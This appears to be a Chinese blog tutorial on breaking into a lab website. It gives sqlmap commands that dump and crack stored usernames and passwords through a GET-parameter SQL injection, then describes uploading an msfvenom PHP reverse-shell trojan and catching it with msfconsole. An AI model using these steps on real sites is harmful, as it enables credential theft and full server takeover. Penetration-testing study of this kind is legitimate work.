如何獲取網站用戶名及密碼以及上傳木馬系列教程之一

 

說明:此篇文章(包含演示用的軟件等)僅供學習及交流使用,嚴禁用於其他用途。

我們很多人在登陸網站的時候,都需要輸入用戶名和密碼進行登陸,假入我們沒有用戶名和密碼時,怎麼登陸呢?一般常見思路有以下幾種:

1.普通人都知道的:暴力破解。

2.利用網站的漏洞(SQL注入等)。

3.利用服務器上的系統漏洞或者軟件漏洞。

4.社會工程。

 

在這裏,我會對以上幾種常見思路進行演示和說明,當然這一篇講的主要是利用SQL注入 GET型注入漏洞。以下的演示環境我是搭建於虛擬機中,進行演示和測試,稍後我會將測試環境打包放在百度雲上,供有需要的朋友進行下載。

 

1.使用OWASP ZAP掃描目標網站,查看是否存在相關漏洞。

 

 

 2.查看是由具有SQL GET類型注入點

 

 

 

3. 使用工具SQLMAP 進行注入測試

(1)爆庫:sqlmap -u "http://192.168.0.212/cat.php?id=3" --dbs

 

 

 (2)爆表:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" --tables

 

 

 (3)爆字段名:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" --columns

 

 

 

 

 

 

 

(4)爆數據庫裏面的用戶名和密碼:sqlmap -u "http://192.168.0.212/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

 

 

 

好了等待一會,發現密碼是使用MD5進行保護的,我們並不知道密碼,沒事,繼續等待一會,sqlmap會使用默認的字典進行破解,等待一會,破解完成,得到了我們想要的用戶名和密碼:

 

 

 然後我們使用得到的用戶名和密碼登陸系統。

 

進入登陸頁面,輸入相應的用戶名和密碼,Well,登陸成功。

 

 

 

系統登陸成功之後,我們查看是否存在上傳漏洞,在網站上查找一會,我們看到了有上傳圖片的接口,我們對該接口進行測試,發現具有文件上傳權限,並且文件過濾名,沒有包含.PHP文件,因此,我們可以上傳

.PHP的木馬來獲取系統的最高權限。

 

 

 4.使用msfvenom生產反彈型木馬

 

 

 

 

 

 5.監聽本地端口,等待反彈木馬的連接

訪問木馬文件,木馬文件,會向我們的TCP端口發起一個連接,從而反向控制服務器。

我們首打開本地監聽端口,等待木馬的反向連接:

這裏使用監聽的是msfconsole工具,啓動msfconsole:

 

 

設置相關參數,然後啓動監聽

 

 好了,已經建立服務器的反向連接了,可以遠程控制計算機了。

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章